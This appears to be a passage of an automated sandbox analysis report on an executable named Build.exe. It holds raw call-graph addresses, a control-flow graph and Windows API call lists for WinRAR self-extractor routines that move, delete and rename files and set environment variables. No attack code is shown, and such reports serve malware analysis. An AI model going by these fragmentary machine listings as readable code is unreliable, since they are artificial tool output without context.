24889->24890 24910 946163 DeleteCriticalSection 24889->24910 24890->24807 24937 94e6aa 24892->24937 24895 94509d 7 API calls 2 library calls 24895->24808 24897 946130 24896->24897 24899 946159 24897->24899 24900 945083 24897->24900 24911 94636c 24897->24911 24916 946163 DeleteCriticalSection 24899->24916 24900->24887 24902 9451ac 24900->24902 24930 94627d 24902->24930 24905 9451c1 24905->24889 24907 9451cf 24908 9451dc 24907->24908 24936 9451df 6 API calls ___vcrt_FlsFree 24907->24936 24908->24889 24910->24887 24917 946192 24911->24917 24914 9463a4 InitializeCriticalSectionAndSpinCount 24915 94638f 24914->24915 24915->24897 24916->24900 24918 9461b3 24917->24918 24919 9461af 24917->24919 24918->24919 24921 94621b GetProcAddress 24918->24921 24923 94620c 24918->24923 24925 946232 LoadLibraryExW 24918->24925 24919->24914 24919->24915 24921->24919 24922 946229 24921->24922 24922->24919 24923->24921 24924 946214 FreeLibrary 24923->24924 24924->24921 24926 946249 GetLastError 24925->24926 24927 946279 24925->24927 24926->24927 24928 946254 ___vcrt_FlsGetValue 24926->24928 24927->24918 24928->24927 24929 94626a LoadLibraryExW 24928->24929 24929->24918 24931 946192 ___vcrt_FlsGetValue 5 API calls 24930->24931 24932 946297 24931->24932 24933 9462b0 TlsAlloc 24932->24933 24934 9451b6 24932->24934 24934->24905 24935 94632e 6 API calls ___vcrt_FlsGetValue 24934->24935 24935->24907 24936->24905 24940 94e6c7 24937->24940 24941 94e6c3 24937->24941 24938 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24939 941793 24938->24939 24939->24811 24939->24895 24940->24941 24943 94ccf0 24940->24943 24941->24938 24944 94ccfc __FrameHandler3::FrameUnwindToState 24943->24944 24955 94d281 EnterCriticalSection 24944->24955 24946 94cd03 24956 94eb78 24946->24956 24948 94cd12 24954 94cd21 24948->24954 24969 94cb79 29 API calls 24948->24969 24951 94cd1c 24970 94cc2f GetStdHandle GetFileType 24951->24970 24952 94cd32 _abort 24952->24940 24971 94cd3d LeaveCriticalSection _abort 24954->24971 24955->24946 24957 94eb84 __FrameHandler3::FrameUnwindToState 24956->24957 24958 94eb91 24957->24958 24959 94eba8 24957->24959 24980 94bc7b 20 API calls __dosmaperr 24958->24980 24972 94d281 EnterCriticalSection 24959->24972 24962 94eb96 24981 946649 26 API calls _abort 24962->24981 24964 94eba0 _abort 24964->24948 24965 94ebe0 24982 94ec07 LeaveCriticalSection _abort 24965->24982 24967 94ebb4 24967->24965 24973 94eac9 24967->24973 24969->24951 24970->24954 24971->24952 24972->24967 24974 94d786 _abort 20 API calls 24973->24974 24976 94eadb 24974->24976 24975 94eae8 24977 94bafa _free 20 API calls 24975->24977 24976->24975 24983 94d55a 24976->24983 24979 94eb3a 24977->24979 24979->24967 24980->24962 24981->24964 24982->24964 24984 94d2e8 _abort 5 API calls 24983->24984 24985 94d581 24984->24985 24986 94d59f InitializeCriticalSectionAndSpinCount 24985->24986 24989 94d58a 24985->24989 24986->24989 24987 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24988 94d5b6 24987->24988 24988->24976 24989->24987 25113 941590 24990->25113 24993 932943 GetProcAddress 24995 932955 24993->24995 24996 93296d GetProcAddress 24993->24996 24994 932999 24997 932cda 24994->24997 25129 949e7e 42 API calls __vsnwprintf_l 24994->25129 24995->24996 24996->24994 24998 93297f 24996->24998 24999 932cdc GetModuleFileNameW 24997->24999 24998->24994 25015 932cfa 24999->25015 25001 932c06 25001->24999 25002 932c13 GetModuleFileNameW CreateFileW 25001->25002 25003 932c47 SetFilePointer 25002->25003 25004 932ccc CloseHandle 25002->25004 25003->25004 25005 932c55 ReadFile 25003->25005 25004->24999 25005->25004 25006 932c73 25005->25006 25008 932ede 25006->25008 25012 932c85 25006->25012 25132 9413f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25008->25132 25010 932ee3 25012->25004 25014 9328ab 7 API calls 25012->25014 25013 932d5c GetFileAttributesW 25013->25015 25016 932d74 25013->25016 25014->25012 25015->25013 25015->25016 25115 92d076 25015->25115 25120 9328ab 25015->25120 25017 932db4 25016->25017 25018 932d7f 25016->25018 25019 932ec3 25017->25019 25020 932dbc 25017->25020 25022 932d98 GetFileAttributesW 25018->25022 25024 932db0 25018->25024 25021 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25019->25021 25025 92d076 6 API calls 25020->25025 25023 932ed5 25021->25023 25022->25018 25022->25024 25045 93c5dd GetCurrentDirectoryW 25023->25045 25024->25017 25026 932dce 25025->25026 25027 932dd5 25026->25027 25028 932e3b 25026->25028 25030 9328ab 7 API calls 25027->25030 25029 924c00 _swprintf 51 API calls 25028->25029 25031 932e63 AllocConsole 25029->25031 25032 932ddf 25030->25032 25034 932e70 GetCurrentProcessId AttachConsole 25031->25034 25035 932ebb ExitProcess 25031->25035 25033 9328ab 7 API calls 25032->25033 25036 932de9 25033->25036 25130 946433 25034->25130 25038 930597 53 API calls 25036->25038 25040 932e04 25038->25040 25039 932e91 GetStdHandle WriteConsoleW Sleep FreeConsole 25039->25035 25041 924c00 _swprintf 51 API calls 25040->25041 25042 932e17 25041->25042 25043 930597 53 API calls 25042->25043 25044 932e26 25043->25044 25044->25035 25045->24827 25047 9328ab 7 API calls 25046->25047 25048 93cced OleInitialize 25047->25048 25049 93cd10 GdiplusStartup SHGetMalloc 25048->25049 25049->24829 25055 93e87c 25050->25055 25051 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25052 93e9b1 25051->25052 25052->24838 25052->24839 25053 93e9a0 25053->25051 25054 934159 CharUpperW 25054->25055 25055->25053 25055->25054 25056 931421 82 API calls 25055->25056 25056->25055 25058 941590 25057->25058 25059 93ffea SetEnvironmentVariableW 25058->25059 25063 940016 25059->25063 25060 94003e 25061 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25060->25061 25062 940049 25061->25062 25062->24832 25063->25060 25064 940032 SetEnvironmentVariableW 25063->25064 25064->25060 25066 93da0b GetObjectW 25065->25066 25067 93d9fe 25065->25067 25069 93da1a 25066->25069 25142 93c652 FindResourceW 25067->25142 25137 93c556 25069->25137 25072 93da70 25084 92f93e 25072->25084 25074 93da4c 25156 93c595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25074->25156 25075 93c652 12 API calls 25077 93da3d 25075->25077 25077->25074 25079 93da43 DeleteObject 25077->25079 25078 93da54 25157 93c574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25078->25157 25079->25074 25081 93da5d 25158 93c79c 13 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25081->25158 25083 93da64 DeleteObject 25083->25072 25169 92f963 25084->25169 25089 93afe6 25090 94121c 27 API calls 25089->25090 25091 93b005 25090->25091 25091->24852 25093 93cd78 GdiplusShutdown OleUninitialize 25092->25093 25093->24871 25096 931379 25095->25096 25099 931383 25095->25099 25317 9312f6 25096->25317 25098 9313f8 GetCurrentProcessId 25100 9313d2 25098->25100 25099->25098 25101 93139d 25099->25101 25107 931421 25100->25107 25101->25100 25323 927bad 76 API calls 2 library calls 25101->25323 25103 9313c0 25324 927d49 76 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25103->25324 25105 9313c9 25325 927ba8 RaiseException _com_raise_error 25105->25325 25109 93142a _wcslen 25107->25109 25108 931455 25108->24857 25109->25108 25326 931334 25109->25326 25111->24863 25112->24870 25114 932914 GetModuleHandleW 25113->25114 25114->24993 25114->24994 25116 92d09c GetVersionExW 25115->25116 25117 92d0c9 25115->25117 25116->25117 25118 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25117->25118 25119 92d0f2 25118->25119 25119->25015 25121 941590 25120->25121 25122 9328b8 GetSystemDirectoryW 25121->25122 25123 9328fa 25122->25123 25124 9328de 25122->25124 25126 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25123->25126 25133 92dd18 25124->25133 25128 932906 25126->25128 25128->25015 25129->25001 25131 94643b 25130->25131 25131->25039 25131->25131 25132->25010 25134 92dd22 25133->25134 25135 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25134->25135 25136 92dda6 LoadLibraryW 25135->25136 25136->25123 25159 93c574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25137->25159 25139 93c55d 25140 93c569 25139->25140 25160 93c595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25139->25160 25140->25072 25140->25074 25140->25075 25143 93c675 SizeofResource 25142->25143 25144 93c763 25142->25144 25143->25144 25145 93c68c LoadResource 25143->25145 25144->25066 25144->25069 25145->25144 25146 93c6a1 LockResource 25145->25146 25146->25144 25147 93c6b2 GlobalAlloc 25146->25147 25147->25144 25148 93c6cd GlobalLock 25147->25148 25149 93c75c GlobalFree 25148->25149 25150 93c6dc __InternalCxxFrameHandler 25148->25150 25149->25144 25151 93c755 GlobalUnlock 25150->25151 25161 93c5b6 GdipAlloc 25150->25161 25151->25149 25154 93c740 25154->25151 25155 93c72a GdipCreateHBITMAPFromBitmap 25155->25154 25156->25078 25157->25081 25158->25083 25159->25139 25160->25140 25162 93c5d5 25161->25162 25163 93c5c8 25161->25163 25162->25151 25162->25154 25162->25155 25165 93c34d 25163->25165 25166 93c375 GdipCreateBitmapFromStream 25165->25166 25167 93c36e GdipCreateBitmapFromStreamICM 25165->25167 25168 93c37a 25166->25168 25167->25168 25168->25162 25170 92f975 25169->25170 25171 92f9cb GetModuleFileNameW 25170->25171 25172 92f9f8 25170->25172 25173 92f9df 25171->25173 25223 92b2b0 25172->25223 25173->25172 25175 92fa47 25236 948bc0 25175->25236 25177 9301bd 78 API calls 25180 92fa1b 25177->25180 25180->25175 25180->25177 25195 92fc4f 25180->25195 25181 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25183 92f94a 25181->25183 25182 92fa5a 25184 948bc0 26 API calls 25182->25184 25221 9301fa GetModuleHandleW FindResourceW 25183->25221 25192 92fa6c ___vcrt_FlsGetValue 25184->25192 25185 92fb92 25185->25195 25272 92b7b0 81 API calls 25185->25272 25189 92fba9 ___std_exception_copy 25190 92b610 82 API calls 25189->25190 25189->25195 25193 92fbcf ___std_exception_copy 25190->25193 25192->25185 25192->25195 25250 92b8c0 25192->25250 25266 92b610 25192->25266 25271 92b7b0 81 API calls 25192->25271 25193->25195 25219 92fbda _wcslen ___std_exception_copy ___vcrt_FlsGetValue 25193->25219 25273 933d10 MultiByteToWideChar 25193->25273 25259 92af2f 25195->25259 25197 92ffed 25214 92fd76 25197->25214 25276 94b52e 26 API calls 2 library calls 25197->25276 25199 9300b6 25280 949ea8 26 API calls 2 library calls 25199->25280 25200 930126 25201 93015c 25200->25201 25205 9301bd 78 API calls 25200->25205 25206 948bc0 26 API calls 25201->25206 25203 93010e 25281 9301d8 78 API calls 25203->25281 25205->25200 25207 930175 25206->25207 25208 948bc0 26 API calls 25207->25208 25208->25195 25210 93000c 25277 949ea8 26 API calls 2 library calls 25210->25277 25211 930064 25278 9301d8 78 API calls 25211->25278 25213 933f47 WideCharToMultiByte 25213->25219 25214->25200 25279 94b52e 26 API calls 2 library calls 25214->25279 25215 9301b7 25282 9413f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25215->25282 25217 9301bc 25219->25195 25219->25197 25219->25213 25219->25214 25219->25215 25274 930531 50 API calls __vsnprintf 25219->25274 25275 948a01 26 API calls 3 library calls 25219->25275 25222 92f951 25221->25222 25222->25089 25224 92b2ba 25223->25224 25225 92b334 CreateFileW 25224->25225 25226 92b34f GetLastError 25225->25226 25229 92b39b 25225->25229 25283 92da1e 25226->25283 25230 92b3df 25229->25230 25232 92b3c5 SetFileTime 25229->25232 25234 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25230->25234 25231 92b370 CreateFileW GetLastError 25231->25229 25233 92b395 25231->25233 25232->25230 25233->25229 25235 92b41e 25234->25235 25235->25180 25237 948bf9 25236->25237 25238 948bfd 25237->25238 25249 948c25 25237->25249 25289 94bc7b 20 API calls __dosmaperr 25238->25289 25240 948c02 25290 946649 26 API calls _abort 25240->25290 25241 948f49 25243 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25241->25243 25245 948f56 25243->25245 25244 948c0d 25246 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25244->25246 25245->25182 25247 948c19 25246->25247 25247->25182 25249->25241 25291 948ae0 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25249->25291 25251 92b8d2 25250->25251 25252 92b8e5 25250->25252 25253 92b8f0 25251->25253 25292 927cd8 77 API calls 25251->25292 25252->25253 25255 92b8f8 SetFilePointer 25252->25255 25253->25192 25255->25253 25256 92b914 GetLastError 25255->25256 25256->25253 25257 92b91e 25256->25257 25257->25253 25293 927cd8 77 API calls 25257->25293 25260 92af5d 25259->25260 25265 92af6e 25259->25265 25261 92af70 25260->25261 25262 92af69 25260->25262 25260->25265 25299 92afd0 25261->25299 25294 92b11a 25262->25294 25265->25181 25267 92b623 25266->25267 25268 92b61c 25266->25268 25267->25268 25270 92b151 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25267->25270 25316 927c95 77 API calls 25267->25316 25268->25192 25270->25267 25271->25192 25272->25189 25273->25219 25274->25219 25275->25219 25276->25210 25277->25211 25278->25214 25279->25199 25280->25203 25281->25200 25282->25217 25286 92da28 _wcslen 25283->25286 25284 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25285 92b36c 25284->25285 25285->25229 25285->25231 25287 92daf7 GetCurrentDirectoryW 25286->25287 25288 92da6f _wcslen 25286->25288 25287->25288 25288->25284 25289->25240 25290->25244 25291->25249 25292->25252 25293->25253 25295 92b123 25294->25295 25296 92b14d 25294->25296 25295->25296 25305 92bc65 25295->25305 25296->25265 25300 92afdc 25299->25300 25302 92affa 25299->25302 25300->25302 25303 92afe8 FindCloseChangeNotification 25300->25303 25301 92b019 25301->25265 25302->25301 25315 927b49 76 API calls 25302->25315 25303->25302 25306 941590 25305->25306 25307 92bc72 DeleteFileW 25306->25307 25308 92bc91 25307->25308 25309 92bcb9 25307->25309 25310 92da1e 6 API calls 25308->25310 25311 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25309->25311 25312 92bca3 25310->25312 25313 92b14b 25311->25313 25312->25309 25314 92bca7 DeleteFileW 25312->25314 25313->25265 25314->25309 25315->25301 25316->25267 25318 93132e 25317->25318 25319 9312ff 25317->25319 25318->25099 25320 9328ab 7 API calls 25319->25320 25321 931309 25320->25321 25321->25318 25322 93130f GetProcAddress GetProcAddress 25321->25322 25322->25318 25323->25103 25324->25105 25325->25100 25327 931342 __InternalCxxFrameHandler 25326->25327 25328 93136b 82 API calls 25327->25328 25329 931366 25328->25329 25329->25108 25331 94a533 _abort 25330->25331 25332 94a54c 25331->25332 25333 94a53a 25331->25333 25354 94d281 EnterCriticalSection 25332->25354 25369 94a681 GetModuleHandleW 25333->25369 25336 94a53f 25336->25332 25370 94a6c5 GetModuleHandleExW 25336->25370 25340 94a553 25350 94a5c8 25340->25350 25353 94a5f1 25340->25353 25355 94b040 25340->25355 25342 94a60e 25361 94a640 25342->25361 25343 94a63a 25378 9549b0 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25343->25378 25347 94b2f1 _abort 5 API calls 25352 94a5e0 25347->25352 25348 94b2f1 _abort 5 API calls 25348->25353 25350->25347 25350->25352 25352->25348 25358 94a631 25353->25358 25354->25340 25379 94ad79 25355->25379 25398 94d2d1 LeaveCriticalSection 25358->25398 25360 94a60a 25360->25342 25360->25343 25399 94d6c6 25361->25399 25364 94a66e 25367 94a6c5 _abort 8 API calls 25364->25367 25365 94a64e GetPEB 25365->25364 25366 94a65e GetCurrentProcess TerminateProcess 25365->25366 25366->25364 25368 94a676 ExitProcess 25367->25368 25369->25336 25371 94a712 25370->25371 25372 94a6ef GetProcAddress 25370->25372 25373 94a721 25371->25373 25374 94a718 FreeLibrary 25371->25374 25375 94a704 25372->25375 25376 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25373->25376 25374->25373 25375->25371 25377 94a54b 25376->25377 25377->25332 25382 94ad28 25379->25382 25381 94ad9d 25381->25350 25383 94ad34 __FrameHandler3::FrameUnwindToState 25382->25383 25390 94d281 EnterCriticalSection 25383->25390 25385 94ad42 25391 94adc9 25385->25391 25389 94ad60 _abort 25389->25381 25390->25385 25392 94ade9 25391->25392 25395 94adf1 25391->25395 25393 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25392->25393 25394 94ad4f 25393->25394 25397 94ad6d LeaveCriticalSection _abort 25394->25397 25395->25392 25396 94bafa _free 20 API calls 25395->25396 25396->25392 25397->25389 25398->25360 25400 94d6e1 25399->25400 25401 94d6eb 25399->25401 25403 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25400->25403 25402 94d2e8 _abort 5 API calls 25401->25402 25402->25400 25404 94a64a 25403->25404 25404->25364 25404->25365 26684 94a7c0 52 API calls 2 library calls 26685 941bc0 27 API calls 26616 9555c0 VariantClear 26617 9429e0 51 API calls 2 library calls 26564 9311eb 26565 9311f3 FreeLibrary 26564->26565 26566 9311fb 26564->26566 26565->26566 26694 94531b 38 API calls 4 library calls 26622 941d07 29 API calls _abort 26624 940900 14 API calls ___delayLoadHelper2@8 26696 941b00 46 API calls __RTC_Initialize 24588 94030b 24589 940318 24588->24589 24598 930597 24589->24598 24596 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24597 940378 24596->24597 24599 9305a7 24598->24599 24610 9305c8 24599->24610 24602 924c00 24637 924bd3 24602->24637 24605 93d864 PeekMessageW 24606 93d8b8 24605->24606 24607 93d87f GetMessageW 24605->24607 24606->24596 24608 93d895 IsDialogMessageW 24607->24608 24609 93d8a4 TranslateMessage DispatchMessageW 24607->24609 24608->24606 24608->24609 24609->24606 24616 92f892 24610->24616 24613 9305c5 24613->24602 24614 9305eb LoadStringW 24614->24613 24615 930602 LoadStringW 24614->24615 24615->24613 24623 92f7b8 24616->24623 24619 92f8d3 24621 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24619->24621 24622 92f8e8 24621->24622 24622->24613 24622->24614 24624 92f7e1 24623->24624 24632 92f85d _strncpy 24623->24632 24627 92f801 24624->24627 24634 933f47 WideCharToMultiByte 24624->24634 24625 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24628 92f88b 24625->24628 24629 92f832 24627->24629 24635 930531 50 API calls __vsnprintf 24627->24635 24628->24619 24633 92f8ec 26 API calls 24628->24633 24636 948a01 26 API calls 3 library calls 24629->24636 24632->24625 24633->24619 24634->24627 24635->24629 24636->24632 24638 924bea __vswprintf_c_l 24637->24638 24641 948772 24638->24641 24644 946835 24641->24644 24645 946875 24644->24645 24646 94685d 24644->24646 24645->24646 24648 94687d 24645->24648 24661 94bc7b 20 API calls __dosmaperr 24646->24661 24650 946dd4 __cftof 38 API calls 24648->24650 24649 946862 24662 946649 26 API calls _abort 24649->24662 24652 94688d 24650->24652 24663 946d9f 20 API calls 2 library calls 24652->24663 24654 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24656 924bf4 SetDlgItemTextW 24654->24656 24655 946905 24664 947184 51 API calls 3 library calls 24655->24664 24656->24605 24659 94686d 24659->24654 24660 946910 24665 946e57 20 API calls _free 24660->24665 24661->24649 24662->24659 24663->24655 24664->24660 24665->24659 26626 94e530 GetCommandLineA GetCommandLineW 26697 944f20 6 API calls 4 library calls 26631 93f950 70 API calls 26632 94b150 7 API calls ___scrt_uninitialize_crt 26633 941d50 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 26634 94cd50 21 API calls 26700 94d750 FreeLibrary 26703 939740 132 API calls 26637 933d49 7 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26704 926b70 41 API calls __EH_prolog3 26705 94dafe 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26706 93ea83 131 API calls 5 library calls 26708 93d361 78 API calls 26641 93e560 91 API calls 2 library calls

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 359 93ea07-93ea55 call 941590 362 93f717-93f739 call 9410f9 359->362 363 93ea5b-93ea81 call 93d5dd 359->363 368 93ea83 363->368 368->362 369 93ea89-93ea9d 368->369 370 93ea9e-93eab3 call 93d148 369->370 373 93eab5 370->373 374 93eab7-93eacc call 934168 373->374 377 93ead9-93eadc 374->377 378 93eace-93ead2 374->378 379 93eae2 377->379 380 93f6ea-93f712 call 93d5dd 377->380 378->374 381 93ead4 378->381 382 93eae9-93eaec 379->382 383 93ed4f-93ed51 379->383 384 93ecae-93ecb0 379->384 385 93ed6d-93ed6f 379->385 380->368 381->380 382->380 391 93eaf2-93eb46 call 93c5dd call 92dd18 call 92c351 call 92c48b call 927eed 382->391 383->380 388 93ed57-93ed68 SetWindowTextW 383->388 384->380 390 93ecb6-93ecc2 384->390 385->380 389 93ed75-93ed7c 385->389 388->380 389->380 392 93ed82-93ed9b 389->392 393 93ecd6-93ecdb 390->393 394 93ecc4-93ecd5 call 949f09 390->394 446 93ec85-93ec97 call 92c3de 391->446 396 93eda3-93edb1 call 946433 392->396 397 93ed9d 392->397 400 93ece5-93ecf0 call 93d76e 393->400 401 93ecdd-93ece3 393->401 394->393 396->380 414 93edb7-93edc0 396->414 397->396 405 93ecf5-93ecf7 400->405 401->405 407 93ed02-93ed22 call 946433 call 9466ae 405->407 408 93ecf9-93ed00 call 946433 405->408 434 93ed24-93ed2b 407->434 435 93ed3b-93ed3d 407->435 408->407 418 93edc2-93edc6 414->418 419 93ede9-93edec 414->419 421 93edf2-93edf5 418->421 424 93edc8-93edd0 418->424 419->421 422 93eee4-93eef2 call 93268b 419->422 427 93ee02-93ee1d 421->427 428 93edf7-93edfc 421->428 438 93eef4-93ef08 call 944b4e 422->438 424->380 430 93edd6-93ede4 call 93268b 424->430 447 93ee7a-93ee81 427->447 448 93ee1f-93ee5a 427->448 428->422 428->427 430->438 441 93ed32-93ed3a call 949f09 434->441 442 93ed2d-93ed2f 434->442 435->380 443 93ed43-93ed4a call 9466a9 435->443 458 93ef15-93ef66 call 93268b call 93d41c GetDlgItem SetWindowTextW SendMessageW call 948796 438->458 459 93ef0a-93ef0e 438->459 441->435 442->441 443->380 462 93eb4b-93eb5f SetFileAttributesW 446->462 463 93ec9d-93eca9 call 92c367 446->463 452 93ee83-93ee9b call 946433 447->452 453 93eeaf-93eed2 call 946433 * 2 447->453 481 93ee6b 448->481 482 93ee5c-93ee63 448->482 452->453 471 93ee9d-93eeaa call 932663 452->471 453->438 486 93eed4-93eee2 call 932663 453->486 498 93ef6b-93ef6f 458->498 459->458 465 93ef10-93ef12 459->465 468 93ec05-93ec15 GetFileAttributesW 462->468 469 93eb65-93eb98 call 92d8ac call 92d52f call 946433 462->469 463->380 465->458 468->446 478 93ec17-93ec26 DeleteFileW 468->478 506 93ebab-93ebb9 call 92dcd9 469->506 507 93eb9a-93eba9 call 946433 469->507 471->453 478->446 484 93ec28-93ec2b 478->484 489 93ee70-93ee72 481->489 487 93ee69 482->487 488 93f73c-93f741 call 9413f9 482->488 492 93ec2f-93ec5b call 924c00 GetFileAttributesW 484->492 486->438 487->489 489->447 504 93ec2d-93ec2e 492->504 505 93ec5d-93ec73 MoveFileW 492->505 498->380 502 93ef75-93ef89 SendMessageW 498->502 502->380 504->492 505->446 508 93ec75-93ec7f MoveFileExW 505->508 506->463 513 93ebbf-93ebfe call 946433 call 942640 506->513 507->506 507->513 508->446 513->468
                                                                                                    APIs
                                                                                                      • Part of subcall function 0093D5DD: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0093D6C7
                                                                                                      • Part of subcall function 0093C5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0093C5E5
                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,?,00000800,?,1C667296,?,00000000,00000001), ref: 0093EB53
                                                                                                    • _wcslen.LIBCMT ref: 0093EB8D
                                                                                                    • _wcslen.LIBCMT ref: 0093EBA1
                                                                                                    • _wcslen.LIBCMT ref: 0093EBC6
                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0093EC0C
                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0093EC1E
                                                                                                    • _swprintf.LIBCMT ref: 0093EC43
                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0093EC52
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0093EC6B
                                                                                                    • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 0093EC7F
                                                                                                    • _wcslen.LIBCMT ref: 0093ECFA
                                                                                                    • _wcslen.LIBCMT ref: 0093ED03
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0093ED62
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$_wcslen$Attributes$Move$CurrentDeleteDirectoryEnvironmentExpandStringsTextWindow_swprintf
                                                                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                    • API String ID: 2983673336-312220925
                                                                                                    • Opcode ID: 9e8ed952f3dbcae0042fa132c9f8f2776d2f5e14476bfe2891eeb519520997b2
                                                                                                    • Instruction ID: e10b2c6cb1bffec6e89fa91e17ab61e25330702ac2cbfe36c0567d21178abb9e
                                                                                                    • Opcode Fuzzy Hash: 9e8ed952f3dbcae0042fa132c9f8f2776d2f5e14476bfe2891eeb519520997b2
                                                                                                    • Instruction Fuzzy Hash: 88F16C72904249AADB31EFA0DC95EEF33BCAF49314F14052AF90AD7190EB749A458B61

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 0093290A: GetModuleHandleW.KERNEL32 ref: 00932937
                                                                                                      • Part of subcall function 0093290A: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00932949
                                                                                                      • Part of subcall function 0093290A: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00932973
                                                                                                      • Part of subcall function 0093C5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0093C5E5
                                                                                                      • Part of subcall function 0093CCD9: OleInitialize.OLE32(00000000), ref: 0093CCF2
                                                                                                      • Part of subcall function 0093CCD9: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0093CD29
                                                                                                      • Part of subcall function 0093CCD9: SHGetMalloc.SHELL32(0096C460), ref: 0093CD33
                                                                                                    • GetCommandLineW.KERNEL32 ref: 009403C9
                                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 009403F3
                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00940404
                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00940455
                                                                                                      • Part of subcall function 0093FFDD: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0093FFFE
                                                                                                      • Part of subcall function 0093FFDD: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00940038
                                                                                                      • Part of subcall function 00931421: _wcslen.LIBCMT ref: 00931445
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0094045C
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe,00000800), ref: 00940476
                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe), ref: 00940482
                                                                                                    • GetLocalTime.KERNEL32(?), ref: 0094048D
                                                                                                    • _swprintf.LIBCMT ref: 009404E1
                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 009404F6
